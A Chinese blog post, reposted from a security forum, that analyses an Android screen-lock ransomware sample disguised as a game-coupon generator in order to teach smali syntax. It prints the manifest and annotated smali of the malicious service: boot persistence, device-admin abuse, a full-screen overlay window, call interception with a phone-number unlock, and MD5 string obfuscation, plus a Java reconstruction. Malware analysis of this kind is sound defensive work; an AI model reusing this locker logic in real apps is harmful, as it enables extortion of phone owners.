从android锁屏病毒来探索smali语法

2019-04-04 约 6949 字 预计阅读 14 分钟

声明:本文 【从android锁屏病毒来探索smali语法】 由作者 yong夜 于 2019-03-30 09:45:00 首发 先知社区 曾经 浏览数 3926 次

感谢 yong夜 的辛苦付出!

引言

本次分析的样本是一款比较简单的android锁屏病毒,通过设备管理器来进行锁屏功能,并利用开机广播和服务的结合实现开机锁屏,解锁方式通过电话拨入,对资源文件进行解密出字符串和来电电话进行匹配的方式进行解锁。我们主要是从者一款比较简单的病毒中熟悉一下smali语法

文件简介

App应用名称: 红包强盗(后台版)
md5: F3ADAADC7A8CB0D16A1AD05AADC8B1F2
包名: com.cjk

详细分析

  1. 第一步,直接先上模拟器,看看大概是个什么毒。从截图看出它想申请设备管理员权限,然后就弹出锁屏界面,一枚锁品病毒

  2. 看看apk包内的文件,在res\raw目录下发现四个可疑文本文件,内容是Cj09QU80TVRuCj1rRE0xY3puMllqTTVuVE0=这些有可能是加密过的字符串,还在res\drawable目录下,发现下面这个qq二维码,也没什么so文件,也不会加固过

  1. 主要从从AndroidManifest.xml文件中看四大组件,一般样本都会将恶意行为放在服务组件,需要重点关注

    <application android:debuggable="false" android:icon="@drawable/icon" android:label="王者荣耀点卷生成器" android:theme="@style/AppTheme">
     <activity android:label="@string/app_name" android:name=".M">
       <intent-filter>
         <action android:name="android.intent.action.MAIN" />
         <category android:name="android.intent.category.LAUNCHER" />
       </intent-filter>
     </activity>
     <service android:name="s" />
     <receiver android:name="bbb">
       <intent-filter android:priority="2147483647">
         <action android:name="android.intent.action.BOOT_COMPLETED" />
       </intent-filter>
     </receiver>
     <receiver android:description="@string/hello" android:name=".MyAdmin">
       <meta-data android:name="android.app.device_admin" android:resource="@xml/my_admin" />
       <intent-filter>
         <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
       </intent-filter>
     </receiver>
    </application>
  2. 1)s服务
    根据服务生命周期表可以知道,针对两种不同方式启动的服务,调用的方法是不同的,因为下面onbind方法并没有任何操作,如果要开启这个服务只会走startService方法,所以我们顺着onCreate->onStartCommand来看

//onBind方法,参数为Intent类实例化的对象
.method public onBind(Intent)IBinder
          //onBind方法方法中用到了6个寄存器
          .registers 6
           //注解,就是java中的@Override
          .annotation runtime Override
          .end annotation
// 将参数p0(this)赋值给变量v0
00000000  move-object         v0, p0
//将参数p1(传入的Intent类型参数)赋值给变量v1
00000002  move-object         v1, p1
00000004  const/4             v3, 0
//检查v3是否可以转化成IBinder类
00000006  check-cast          v3, IBinder
0000000A  move-object         v0, v3
//返回一个null对象
0000000C  return-object       v0
.end method

在看oncreate之前,在他的构造方法中,可以看见有几个敏感的数据,QQ号暱称,并且将这串字符串进行静态方法MD5Util->getMD5String的处理,下面主要看看这个处理过程

.method public constructor <init>()V
          .registers 5
00000000  move-object         v0, p0
00000002  move-object         v2, v0
//直接调用Service的构造方法super(),(这种调用不存在被覆盖,编译时静态确认)
00000004  invoke-direct       Service-><init>()V, v2
0000000A  move-object         v2, v0
0000000C  const-string        v3, "by:彼岸花 qq:127****738"
//将v3的字符串存放在v2中,并且v2=s->bahk:String(this.bahk)
00000010  iput-object         v3, v2, s->bahk:String
//使用this清空v2,v3
00000014  move-object         v2, v0
00000016  move-object         v3, v0
//获取s->bahk:String的值放入v3,然后让s->bahk:String指向v3
00000018  iget-object         v3, v3, s->bahk:String
//调用静态方法(不需要对象,所以少一个参数),看名称应该是获取md5字符串
0000001C  invoke-static       MD5Util->getMD5String(String)String, v3
00000022  move-result-object  v3
//最后让经过处理的字符串v3放入this.Lycorisradiata
00000024  iput-object         v3, v2, s->Lycorisradiata:String
00000028  return-void
.end method

处理函数getMD5String,它将字符串by:彼岸花 qq:127****738,先进行了md5摘要计算,得到一个第一次加密过的字节数组,然后在new一个长度是其2倍的char型数组,接着第一次加密过的字节数组的每一个字节经过2次加密,生成不同的字符,填入到new出来的char型数组中,最终将其转化成字符串返回

.method public static final getMD5String(String)String
          .registers 19
//静态方法,没有引用对象,所以p0=参数String
00000000  move-object/from16  v0, p0
//v12 = char[16] 创建16长度的char型数组,将其赋给v12
00000004  const/16            v12, 0x0010
00000008  new-array           v12, v12, [C
//将EC指向的2字节长度的char数据填入数组
0000000C  fill-array-data     v12, :EC
//v2 = char[16] ,v12=this,将数组赋给v2,用this清空v12
00000012  move-object         v2, v12  # v2 = charArray1 =  new char[]{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'}
00000014  move-object         v12, v0
:16
//v12.getBytes()将字符串转化成字节数组,调用虚方法,也就是v12是被引用的对象
//然后使用MD5信息摘要算法对这个字节数组进行计算,将hash值在00000040地址赋给v12
00000016  invoke-virtual      String->getBytes()[B, v12
0000001C  move-result-object  v12
0000001E  move-object         v3, v12
00000020  const-string        v12, "MD5"
00000024  invoke-static       MessageDigest->getInstance(String)MessageDigest, v12
0000002A  move-result-object  v12
//因为v12(信息摘要对象)在00000032  位置做被引用的参数对象,所以将其赋给v4来接收update方法更改后的摘要对象
0000002C  move-object         v4, v12
0000002E  move-object         v12, v4
00000030  move-object         v13, v3
00000032  invoke-virtual      MessageDigest->update([B)V, v12, v13
00000038  move-object         v12, v4
0000003A  invoke-virtual      MessageDigest->digest()[B, v12
00000040  move-result-object  v12
00000042  move-object         v5, v12  # v5 = md5ByteArray 字节数组类型的信息摘要
00000044  move-object         v12, v5
//带有信息摘要的字节数组长度赋给v12,然后将这个长度乘以2,利用这个长度再实例化一个char型数组给v7
00000046  array-length        v12, v12
00000048  move                v6, v12
0000004A  move                v12, v6  # v6 = len_of_md5ByteArray
0000004C  const/4             v13, 2
0000004E  mul-int/lit8        v12, v12, 2
00000052  new-array           v12, v12, [C
00000056  move-object         v7, v12  # v7 = charArray2 = new char[2 * len_of_md5ByteArray]
00000058  const/4             v12, 0
0000005A  move                v8, v12  # v8 = 0
0000005C  const/4             v12, 0
0000005E  move                v9, v12
:60
//v12=v9=0,v13=v6=md5字节数组的长度
//如果v12<v13跳转到:84,紧跟着下面有个goto :60跳转回来,构成了一个for循环
00000060  move                v12, v9
00000062  move                v13, v6
00000064  if-lt               v12, v13, :84  # for(int v9=0; v9<v6; v9++)
:68
00000068  new-instance        v12, String  # v12 = v17 = new String()
0000006C  move-object/from16  v17, v12
00000070  move-object/from16  v12, v17
00000074  move-object/from16  v13, v17
00000078  move-object         v14, v7
0000007A  invoke-direct       String-><init>([C)V, v13, v14  # v12 = v13 = new String(charArray2)
00000080  move-object         v0, v12
:82
00000082  return-object       v0
:84
00000084  move-object         v12, v5
00000086  move                v13, v9
00000088  aget-byte           v12, v12, v13
0000008C  move                v10, v12  # v10 =  md5ByteArray[v9]
0000008E  move-object         v12, v7  # v12 = v7 = charArray2
00000090  move                v13, v8  # v13 = v8
00000092  add-int/lit8        v8, v8, 1  # ++v8
00000096  move-object         v14, v2  # v2 = charArray1
00000098  move                v15, v10
0000009A  const/16            v16, 4
0000009E  ushr-int/lit8       v15, v15, 4
000000A2  const/16            v16, 15
000000A6  and-int/lit8        v15, v15, 15
000000AA  aget-char           v14, v14, v15
000000AE  aput-char           v14, v12, v13  # charArray2[v13] = charArray1[md5ByteArray[v9] >> 4 & 15]
000000B2  move-object         v12, v7
000000B4  move                v13, v8  # v13 = v8
000000B6  add-int/lit8        v8, v8, 1  # ++v8
000000BA  move-object         v14, v2
000000BC  move                v15, v10
000000BE  const/16            v16, 15
000000C2  and-int/lit8        v15, v15, 15
000000C6  aget-char           v14, v14, v15
000000CA  aput-char           v14, v12, v13  # charArray2[v13] = charArray1[md5ByteArray[v9] & 15]
:CE
000000CE  add-int/lit8        v9, v9, 1
000000D2  goto                :60
:D4
000000D4  move-exception      v12
000000D6  move-object         v3, v12
000000D8  move-object         v12, v3
000000DA  invoke-virtual      Exception->printStackTrace()V, v12
000000E0  const/4             v12, 0
000000E2  check-cast          v12, String
000000E6  move-object         v0, v12
000000E8  goto                :82
          .catch Exception {:16 .. :CE} :D4
:EC
000000EC  .array-data 2 x 0x10
              0x30
              0x31
              0x32
              0x33
              0x34
              0x35
              0x36
              0x37
              0x38
              0x39
              0x41
              0x42
              0x43
              0x44
              0x45
              0x46
          .end array-data
.end method

这里将注释集合起来,大概是这样的加密过程,这里主要是大致预览加密逻辑

charArray1 =  new char[]{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'}
string = "by:彼岸花 qq:1279525738";
byte[] v3 = string.getBytes();
MessageDigest v4 = MessageDigest.getInstance("MD5");
v4.update(v3);
byte[] v5 = md5ByteArray = v4.digest() //字节数组类型的信息摘要
v6 = md5ByteArray.length()
v7 = charArray2 = new char[2 * v6]
for(int v9=0; v9<v6; v9++){

    v10 =  md5ByteArray[v9]
    v12 = v7 = charArray2
    v13 = v8
    ++v8
    v2 = charArray1
    //对单个字节的第一次加密
    v7[v13] = charArray2[v13] = charArray1[md5ByteArray[v9] >> 4 & 15]
    v13 = v8
    ++v8
    //对单个字节的第二次加密
    v7[v13] = charArray2[v13] = charArray1[md5ByteArray[v9] & 15]
}
v12 = new String(charArray2)
return v12

然后接着分析s服务的oncreate方法,先打印日志并通过Intent使用广播发送出去,让包名为com.aide.ui的接收,这里动态注册了一个监听接收短信、电话状态的广播,如果有电话拨进来,会将来电电话号码和经过字符串处理的hm资源文件里的字符串进行比较,如果相等就结束前台呼叫、移除newone布局,设置铃声静音,停止服务s(很明显是解锁方法),如果不相等则会拦截下这条广播。然后又用bah.java8e6762e8737463a957dc390bff4eb8e8两个字符串生成对应的DES加密、解密对象,还有实例化一个by:彼岸花 qq:1279525738.xml存储文件的编辑器对象,但是都没有后面的操作,最后执行了重复手机震动操作,每过0.1s震动1.5s

.method public onCreate()V
          .registers 15
          .annotation system Signature
              value = {
                  "()V"
              }
          .end annotation
          .annotation runtime Override
          .end annotation
00000000  move-object         v0, p0  # v0 = this
00000002  move-object         v7, v0
00000004  const-string        v8, "com.aide.ui"
00000008  invoke-static       ADRTLogCatReader->onContext(Context, String)V, v7, v8  # ADRTLogCatReader.onContext(this, "com.aide.ui")
0000000E  move-object         v7, v0
00000010  invoke-super        Service->onCreate()V, v7  # this.Service.onCreate()
00000016  move-object         v7, v0
00000018  new-instance        v8, s$IncomingCallReceiver  # 实例化一个IncomingCallReceiver对象
0000001C  move-object         v13, v8
0000001E  move-object         v8, v13
00000020  move-object         v9, v13
00000022  move-object         v10, v0
00000024  invoke-direct       s$IncomingCallReceiver-><init>(s)V, v9, v10  # 调用incomingCallReceiver的构造方法进行初始化: new IncomingCallReceiver(this)
0000002A  iput-object         v8, v7, s->mReceiver:s$IncomingCallReceiver  # this.mReceiver = incomingCallReceiver
0000002E  new-instance        v7, IntentFilter
00000032  move-object         v13, v7
00000034  move-object         v7, v13
00000036  move-object         v8, v13
00000038  invoke-direct       IntentFilter-><init>()V, v8  # IntentFilter intentfilter = new IntentFilter()
0000003E  move-object         v2, v7
00000040  move-object         v7, v2
00000042  const-string        v8, "android.intent.action.PHONE_STATE"
00000046  invoke-virtual      IntentFilter->addAction(String)V, v7, v8
0000004C  move-object         v7, v2
0000004E  const-string        v8, "android.provider.Telephony.SMS_RECEIVED"
00000052  invoke-virtual      IntentFilter->addAction(String)V, v7, v8
00000058  move-object         v7, v0
0000005A  move-object         v8, v0
0000005C  iget-object         v8, v8, s->mReceiver:s$IncomingCallReceiver
00000060  move-object         v9, v2
00000062  invoke-virtual      s->registerReceiver(BroadcastReceiver, IntentFilter)Intent, v7, v8, v9  # this.registerReceiver(this.mReceiver, intentfilter)
00000068  move-result-object  v7
0000006A  move-object         v7, v0
0000006C  move-object         v8, v0
0000006E  const-string        v9, "audio"
00000072  invoke-virtual      s->getSystemService(String)Object, v8, v9
00000078  move-result-object  v8
0000007A  check-cast          v8, AudioManager
0000007E  iput-object         v8, v7, s->mAudioManager:AudioManager  # this.mAudioManager = this.getSystemService("audio")
00000082  move-object         v7, v0
00000084  const-string        v8, "phone"
00000088  invoke-virtual      s->getSystemService(String)Object, v7, v8
0000008E  move-result-object  v7
00000090  check-cast          v7, TelephonyManager
00000094  move-object         v3, v7
:96
00000096  const-string        v7, "android.telephony.TelephonyManager"
0000009A  invoke-static       Class->forName(String)Class, v7
:A0
000000A0  move-result-object  v7
:A2
000000A2  const-string        v8, "getITelephony"
000000A6  const/4             v9, 0
000000A8  check-cast          v9, [Class
000000AC  invoke-virtual      Class->getDeclaredMethod(String, [Class)Method, v7, v8, v9  # Method v4 = Class.forName("android.telephony.TelephonyManager").getDeclaredMethod("getITelephony", 0)
000000B2  move-result-object  v7
000000B4  move-object         v4, v7
000000B6  move-object         v7, v4
000000B8  const/4             v8, 1
000000BA  invoke-virtual      Method->setAccessible(Z)V, v7, v8  # v4.setAccessible(1)关闭安全检查
000000C0  move-object         v7, v0
000000C2  move-object         v8, v4
000000C4  move-object         v9, v3
000000C6  const/4             v10, 0
000000C8  check-cast          v10, [Object
000000CC  invoke-virtual      Method->invoke(Object, [Object)Object, v8, v9, v10  # v4.invoke(telephoneManager, 0)
000000D2  move-result-object  v8
000000D4  check-cast          v8, ITelephony
000000D8  iput-object         v8, v7, s->iTelephony:ITelephony  # this.iTelephony = v4.invoke(telephoneManager, 0)
:DC
000000DC  move-object         v7, v0
000000DE  new-instance        v8, DU
000000E2  move-object         v13, v8
000000E4  move-object         v8, v13
000000E6  move-object         v9, v13
000000E8  const-string        v10, "bah.java"
000000EC  invoke-direct       DU-><init>(String)V, v9, v10
000000F2  iput-object         v8, v7, s->des:DU  # s.des = new DU("bah.java")
000000F6  move-object         v7, v0
:F8
000000F8  new-instance        v8, DU
000000FC  move-object         v13, v8
000000FE  move-object         v8, v13
00000100  move-object         v9, v13
00000102  move-object         v10, v0
00000104  iget-object         v10, v10, s->des:DU
00000108  const-string        v11, "8e6762e8737463a957dc390bff4eb8e8"
0000010C  invoke-virtual      DU->decrypt(String)String, v10, v11
00000112  move-result-object  v10
00000114  invoke-direct       DU-><init>(String)V, v9, v10
0000011A  iput-object         v8, v7, s->des:DU  # s.des = new DU(s.des.decrypt("8e6762e8737463a957dc390bff4eb8e8"))
:11E
0000011E  move-object         v7, v0
00000120  move-object         v8, v0
00000122  move-object         v9, v0
00000124  iget-object         v9, v9, s->bahk:String
00000128  const/4             v10, 0
0000012A  invoke-virtual      s->getSharedPreferences(String, I)SharedPreferences, v8, v9, v10
00000130  move-result-object  v8
00000132  iput-object         v8, v7, s->share:SharedPreferences  # this.share = this.getSharedPreferences("by:彼岸花 qq:1279525738", 0)
00000136  move-object         v7, v0
00000138  move-object         v8, v0
0000013A  iget-object         v8, v8, s->share:SharedPreferences
0000013E  invoke-interface    SharedPreferences->edit()SharedPreferences$Editor, v8
00000144  move-result-object  v8
00000146  iput-object         v8, v7, s->editor:SharedPreferences$Editor  # this.editor = this.share.edit()
0000014A  move-object         v7, v0
0000014C  invoke-virtual      s->getApplication()Application, v7
00000152  move-result-object  v7
00000154  const-string        v8, "vibrator"
00000158  invoke-virtual      Application->getSystemService(String)Object, v7, v8  # this.getApplication().getSystemService("vibrator")
0000015E  move-result-object  v7
00000160  check-cast          v7, Vibrator
00000164  move-object         v4, v7
00000166  move-object         v7, v4
00000168  const/4             v8, 4
0000016A  new-array           v8, v8, [J  # long[] longArray = new long[4]
0000016E  move-object         v13, v8
00000170  move-object         v8, v13
00000172  move-object         v9, v13
00000174  const/4             v10, 0
00000176  const/16            v11, 100  # (long)100
0000017A  int-to-long         v11, v11
0000017C  aput-wide           v11, v9, v10  # longArray[0] = (long)100
00000180  move-object         v13, v8
00000182  move-object         v8, v13
00000184  move-object         v9, v13
00000186  const/4             v10, 1
00000188  const/16            v11, 1500
0000018C  int-to-long         v11, v11
0000018E  aput-wide           v11, v9, v10
00000192  move-object         v13, v8
00000194  move-object         v8, v13
00000196  move-object         v9, v13
00000198  const/4             v10, 2
0000019A  const/16            v11, 100
0000019E  int-to-long         v11, v11
000001A0  aput-wide           v11, v9, v10
000001A4  move-object         v13, v8
000001A6  move-object         v8, v13
000001A8  move-object         v9, v13
000001AA  const/4             v10, 3
000001AC  const/16            v11, 1500
000001B0  int-to-long         v11, v11
000001B2  aput-wide           v11, v9, v10  # longArray = new long[]{(long)100, (long)1500, (long)100, (long)1500}
000001B6  const/4             v9, 0
000001B8  invoke-virtual      Vibrator->vibrate([J, I)V, v7, v8, v9  # this.getApplication().getSystemService("vibrator").vibrate(longArray, 0)
000001BE  return-void
:1C0
000001C0  move-exception      v7
000001C2  move-object         v5, v7
:1C4
000001C4  new-instance        v7, NoClassDefFoundError
000001C8  move-object         v13, v7
000001CA  move-object         v7, v13
000001CC  move-object         v8, v13
000001CE  move-object         v9, v5
000001D0  invoke-virtual      Throwable->getMessage()String, v9
000001D6  move-result-object  v9
000001D8  invoke-direct       NoClassDefFoundError-><init>(String)V, v8, v9
000001DE  throw               v7
:1E0
000001E0  move-exception      v7
000001E2  move-object         v4, v7
000001E4  goto/16             :DC
:1E8
000001E8  move-exception      v7
000001EA  move-object         v4, v7
000001EC  goto                :11E
          .catch ClassNotFoundException {:96 .. :A0} :1C0
          .catch Exception {:96 .. :A0} :1E0
          .catch Exception {:A2 .. :DC} :1E0
          .catch Exception {:F8 .. :11E} :1E8
          .catch Exception {:1C4 .. :1E0} :1E01
.end method

ADRTLogCatReader.onContext方法
调用onContext静态方法,检查本引用是否可以调试,如果不可以则该方法返回为空,如果可以调试,先初始化ADRTSender的一些静态属性,然后开启一个线程,执行logcat -v threadtime打印日志,然后每次读取20个字符,并且每次读取一行,将其作为数据参数放入intent里,通过广播发送出去,指定接收包名是"com.aide.ui",action是"com.adrt.LOGCAT_ENTRIES"

.method public static onContext(Context, String)V
          .registers 12
00000000  move-object         v0, p0
00000002  move-object         v1, p1
00000004  sget-object         v5, ADRTLogCatReader->context:Context  # v5 = ADRTLogCatReader.context
00000008  if-eqz              v5, :E  # if ADRTLogCatReader.context == null{return null;}这个方法onContext只能调用一次
:C
0000000C  return-void
:E
0000000E  move-object         v5, v0
00000010  invoke-virtual      Context->getApplicationContext()Context, v5
00000016  move-result-object  v5
00000018  sput-object         v5, ADRTLogCatReader->context:Context  # ADRTLogCatReader.context =  this.getApplicationContext()
0000001C  const/4             v5, 0
0000001E  move-object         v6, v0
00000020  invoke-virtual      Context->getApplicationInfo()ApplicationInfo, v6
00000026  move-result-object  v6
00000028  iget                v6, v6, ApplicationInfo->flags:I
0000002C  const/4             v7, 2
0000002E  and-int/lit8        v6, v6, 2
00000032  if-eq               v5, v6, :42  # if(this.ApplicationInfo.flag & 2 == 0){return null;}检查应用是否允许调试
:36
00000036  const/4             v5, 1
:38
00000038  move                v2, v5
0000003A  move                v5, v2
0000003C  if-nez              v5, :46
:40
00000040  goto                :C
:42
00000042  const/4             v5, 0
00000044  goto                :38
:46
00000046  move-object         v5, v0
:48
00000048  invoke-virtual      Context->getPackageManager()PackageManager, v5
0000004E  move-result-object  v5
00000050  move-object         v3, v5
00000052  move-object         v5, v3
00000054  move-object         v6, v1
00000056  const/16            v7, 0x0080
0000005A  invoke-virtual      PackageManager->getPackageInfo(String, I)PackageInfo, v5, v6, v7  # this.getPackageManager().getPackageInfo("com.aide.ui", 0x0080)
# 这里获取"com.aide.ui"包应用的META信息,但是后面没有再调用了这个的数据
:60
00000060  move-result-object  v5
00000062  move-object         v4, v5
00000064  sget-object         v5, ADRTLogCatReader->context:Context
00000068  move-object         v6, v1
0000006A  invoke-static       ADRTSender->onContext(Context, String)V, v5, v6  # ADRTSender.onContext(ADRTLogCatReader.context, "com.aide.ui")
00000070  new-instance        v5, Thread  # Thread thread;
00000074  move-object         v9, v5
00000076  move-object         v5, v9
00000078  move-object         v6, v9
0000007A  new-instance        v7, ADRTLogCatReader  # ADRTLogCatReader aDRTLogCatReader;
0000007E  move-object         v9, v7
00000080  move-object         v7, v9
00000082  move-object         v8, v9
00000084  invoke-direct       ADRTLogCatReader-><init>()V, v8  # aDRTLogCatReader = new ADRTLogCatReader()
0000008A  const-string        v8, "LogCat"
0000008E  invoke-direct       Thread-><init>(Runnable, String)V, v6, v7, v8  # thread(aDRTLogCatReader, "LogCat")
00000094  move-object         v3, v5
00000096  move-object         v5, v3
00000098  invoke-virtual      Thread->start()V, v5  # thread(aDRTLogCatReader, "LogCat").start()
0000009E  goto                :C
:A0
000000A0  move-exception      v5
000000A2  move-object         v3, v5
000000A4  goto                :C
          .catch PackageManager$NameNotFoundException {:48 .. :60} :A0
.end method

.method public run()V
          .registers 11
00000000  move-object         v0, p0
:2
00000002  invoke-static       Runtime->getRuntime()Runtime
00000008  move-result-object  v4
0000000A  const-string        v5, "logcat -v threadtime"
0000000E  invoke-virtual      Runtime->exec(String)Process, v4, v5  # Process pc = Runtime.getRuntime().exec("logcat -v threadtime")
00000014  move-result-object  v4
00000016  move-object         v1, v4
00000018  new-instance        v4, BufferedReader  # BufferedReader br;
0000001C  move-object         v9, v4
0000001E  move-object         v4, v9
00000020  move-object         v5, v9
00000022  new-instance        v6, InputStreamReader  # InputStreamReader is;
00000026  move-object         v9, v6
00000028  move-object         v6, v9
0000002A  move-object         v7, v9
0000002C  move-object         v8, v1
0000002E  invoke-virtual      Process->getInputStream()InputStream, v8  # pc.getInputStream()
00000034  move-result-object  v8
00000036  invoke-direct       InputStreamReader-><init>(InputStream)V, v7, v8  # is = new InputStreamReader(pc.getInputStream)
0000003C  const/16            v7, 20
00000040  invoke-direct       BufferedReader-><init>(Reader, I)V, v5, v6, v7  # br = new BufferedReader(new InputStreamReader(pc.getInputStream), 20)
00000046  move-object         v2, v4
00000048  const-string        v4, ""
0000004C  move-object         v3, v4
:4E
0000004E  move-object         v4, v2
00000050  invoke-virtual      BufferedReader->readLine()String, v4  # br.readLine()
00000056  move-result-object  v4
00000058  move-object         v9, v4
0000005A  move-object         v4, v9
0000005C  move-object         v5, v9
0000005E  move-object         v3, v5
00000060  if-eqz              v4, :80
:64
00000064  const/4             v4, 1
00000066  new-array           v4, v4, [String  # String[] st = new String[1];
0000006A  move-object         v9, v4
0000006C  move-object         v4, v9
0000006E  move-object         v5, v9
00000070  const/4             v6, 0
00000072  move-object         v7, v3
00000074  aput-object         v7, v5, v6  # st[0] = br.readLine()
00000078  invoke-static       ADRTSender->sendLogcatLines([String)V, v4  # ADRTSender.sendLogcatLines(st)
:7E
0000007E  goto                :4E
:80
00000080  return-void
:82
00000082  move-exception      v4
00000084  move-object         v1, v4
00000086  goto                :80
          .catch IOException {:2 .. :7E} :82
.end method

接着分析:onstart方法(android-15之后就被onStartCommand代替了)
主要执行了方法c,主要是将处理好的字符串附加到layout/newone.xml文件内的几个TextView控件上

0000000C  invoke-super        Service->onStart(Intent, I)V, v4, v5, v6  # this.super(v1, v2)
00000012  move-object         v4, v0
00000014  invoke-direct       s->c()V, v4  # this.c()
.method private c()V
          .registers 21
          .annotation system Signature
              value = {
                  "()V"
              }
          .end annotation
00000000  move-object/from16  v1, p0
00000004  move-object         v15, v1
00000006  new-instance        v16, WindowManager$LayoutParams
0000000A  move-object/from16  v19, v16
0000000E  move-object/from16  v16, v19
00000012  move-object/from16  v17, v19
00000016  invoke-direct/range WindowManager$LayoutParams-><init>()V, v17 .. v17
0000001C  move-object/from16  v0, v16
00000020  iput-object         v0, v15, s->wmParams:WindowManager$LayoutParams  # this.wmParams = new WindowManager$LayoutParams()
00000024  move-object         v15, v1
00000026  move-object/from16  v16, v1
0000002A  invoke-virtual/range s->getApplication()Application, v16 .. v16
00000030  move-result-object  v16
00000032  move-object/from16  v17, v1
00000036  invoke-virtual/range s->getApplication()Application, v17 .. v17
0000003C  move-result-object  v17
0000003E  sget-object         v17, Context->WINDOW_SERVICE:String
00000042  invoke-virtual/range Application->getSystemService(String)Object, v16 .. v17
00000048  move-result-object  v16
0000004A  check-cast          v16, WindowManager
0000004E  move-object/from16  v0, v16
00000052  iput-object         v0, v15, s->mWindowManager:WindowManager  # mWindowManager = this.getApplication().getsystemService(CONTEXT.WINDOW_SERVICE)
00000056  move-object         v15, v1
00000058  iget-object         v15, v15, s->wmParams:WindowManager$LayoutParams  # this.wmParams
0000005C  const/16            v16, 2010
00000060  move/from16         v0, v16
00000064  iput                v0, v15, WindowManager$LayoutParams->type:I  # this.wmParams.type = 2010
00000068  move-object         v15, v1
0000006A  iget-object         v15, v15, s->wmParams:WindowManager$LayoutParams
0000006E  const/16            v16, 1
00000072  move/from16         v0, v16
00000076  iput                v0, v15, WindowManager$LayoutParams->format:I  # this.wmParams.format = 1
0000007A  move-object         v15, v1
0000007C  iget-object         v15, v15, s->wmParams:WindowManager$LayoutParams
00000080  const/16            v16, 0x0500
00000084  move/from16         v0, v16
00000088  iput                v0, v15, WindowManager$LayoutParams->flags:I  # this.wmParams.flags = 0x0500
0000008C  move-object         v15, v1
0000008E  iget-object         v15, v15, s->wmParams:WindowManager$LayoutParams
00000092  const/16            v16, 49
00000096  move/from16         v0, v16
0000009A  iput                v0, v15, WindowManager$LayoutParams->gravity:I  # this.wmParams.gravity = 49
0000009E  move-object         v15, v1
000000A0  iget-object         v15, v15, s->wmParams:WindowManager$LayoutParams
000000A4  const/16            v16, 0
000000A8  move/from16         v0, v16
000000AC  iput                v0, v15, WindowManager$LayoutParams->x:I  # this.wmParams.x = 0
000000B0  move-object         v15, v1
000000B2  iget-object         v15, v15, s->wmParams:WindowManager$LayoutParams
000000B6  const/16            v16, 0
000000BA  move/from16         v0, v16
000000BE  iput                v0, v15, WindowManager$LayoutParams->y:I  # this.wmParams.y = 0
000000C2  move-object         v15, v1
000000C4  iget-object         v15, v15, s->wmParams:WindowManager$LayoutParams
000000C8  const/16            v16, -0x0001
000000CC  move/from16         v0, v16
000000D0  iput                v0, v15, ViewGroup$LayoutParams->width:I  # this.wmParams.width=0x0001
000000D4  move-object         v15, v1
000000D6  iget-object         v15, v15, s->wmParams:WindowManager$LayoutParams
000000DA  const/16            v16, -0x0001
000000DE  move/from16         v0, v16
000000E2  iput                v0, v15, ViewGroup$LayoutParams->height:I  # this.wmParams.height = -0x0001
000000E6  move-object         v15, v1
000000E8  invoke-virtual      s->getApplication()Application, v15
000000EE  move-result-object  v15
000000F0  invoke-static       LayoutInflater->from(Context)LayoutInflater, v15
000000F6  move-result-object  v15
000000F8  move-object         v3, v15
000000FA  move-object         v15, v1
000000FC  move-object/from16  v16, v3
00000100  const               v17, 0x7F030001
00000106  const/16            v18, 0
0000010A  check-cast          v18, ViewGroup
0000010E  invoke-virtual/range LayoutInflater->inflate(I, ViewGroup)View, v16 .. v18
00000114  move-result-object  v16
00000116  move-object/from16  v0, v16
0000011A  iput-object         v0, v15, s->mFloatLayout:View  # this.mFloatLayout = LayoutInflater.from(this.getApplication).inflate(0x7F030001, 0)
0000011E  move-object         v15, v1
00000120  iget-object         v15, v15, s->mWindowManager:WindowManager
00000124  move-object/from16  v16, v1
00000128  move-object/from16  v0, v16
0000012C  iget-object         v0, v0, s->mFloatLayout:View
00000130  move-object/from16  v16, v0
00000134  move-object/from16  v17, v1
00000138  move-object/from16  v0, v17
0000013C  iget-object         v0, v0, s->wmParams:WindowManager$LayoutParams
00000140  move-object/from16  v17, v0
00000144  invoke-interface/range WindowManager->addView(View, ViewGroup$LayoutParams)V, v15 .. v17  # this.mWindowManager.addView(this.mFloatLayout, this.wmParams)
0000014A  move-object         v15, v1
0000014C  move-object/from16  v16, v1
00000150  move-object/from16  v0, v16
00000154  iget-object         v0, v0, s->mFloatLayout:View
00000158  move-object/from16  v16, v0
0000015C  const/high16        v17, 0x7F0A0000
00000160  invoke-virtual/range View->findViewById(I)View, v16 .. v17
00000166  move-result-object  v16
00000168  check-cast          v16, TextView
0000016C  move-object/from16  v0, v16
00000170  iput-object         v0, v15, s->wb:TextView  # this.wb = mFloatLayout.findViewById(0x7F0A0000)
00000174  move-object         v15, v1
00000176  move-object/from16  v16, v1
0000017A  move-object/from16  v0, v16
0000017E  iget-object         v0, v0, s->mFloatLayout:View
00000182  move-object/from16  v16, v0
00000186  const               v17, 0x7F0A0001
0000018C  invoke-virtual/range View->findViewById(I)View, v16 .. v17
00000192  move-result-object  v16
00000194  check-cast          v16, TextView
00000198  move-object/from16  v0, v16
0000019C  iput-object         v0, v15, s->bah:TextView
000001A0  move-object         v15, v1
000001A2  move-object/from16  v16, v1
000001A6  move-object/from16  v0, v16
000001AA  iget-object         v0, v0, s->mFloatLayout:View
000001AE  move-object/from16  v16, v0
000001B2  const               v17, 0x7F0A0002
000001B8  invoke-virtual/range View->findViewById(I)View, v16 .. v17
000001BE  move-result-object  v16
000001C0  check-cast          v16, TextView
000001C4  move-object/from16  v0, v16
000001C8  iput-object         v0, v15, s->cjk:TextView
000001CC  move-object         v15, v1
000001CE  move-object/from16  v16, v1
000001D2  move-object/from16  v0, v16
000001D6  iget-object         v0, v0, s->mFloatLayout:View
000001DA  move-object/from16  v16, v0
000001DE  const               v17, 0x7F0A0003
000001E4  invoke-virtual/range View->findViewById(I)View, v16 .. v17
000001EA  move-result-object  v16
000001EC  check-cast          v16, TextView
000001F0  move-object/from16  v0, v16
000001F4  iput-object         v0, v15, s->tv:TextView
:1F8
000001F8  new-instance        v15, StringBuffer
000001FC  move-object/from16  v19, v15
00000200  move-object/from16  v15, v19
00000204  move-object/from16  v16, v19
00000208  invoke-direct/range StringBuffer-><init>()V, v16 .. v16  # stringbuffer = new StringBuffer()
0000020E  move-object/from16  v16, v1
00000212  move-object/from16  v0, v16
00000216  iget-object         v0, v0, s->Lycorisradiata:String  # this.Lycorisradiata
0000021A  move-object/from16  v16, v0
0000021E  invoke-virtual/range StringBuffer->append(String)StringBuffer, v15 .. v16  # stringbuffer.append(this.Lycorisradiata)
00000224  move-result-object  v15
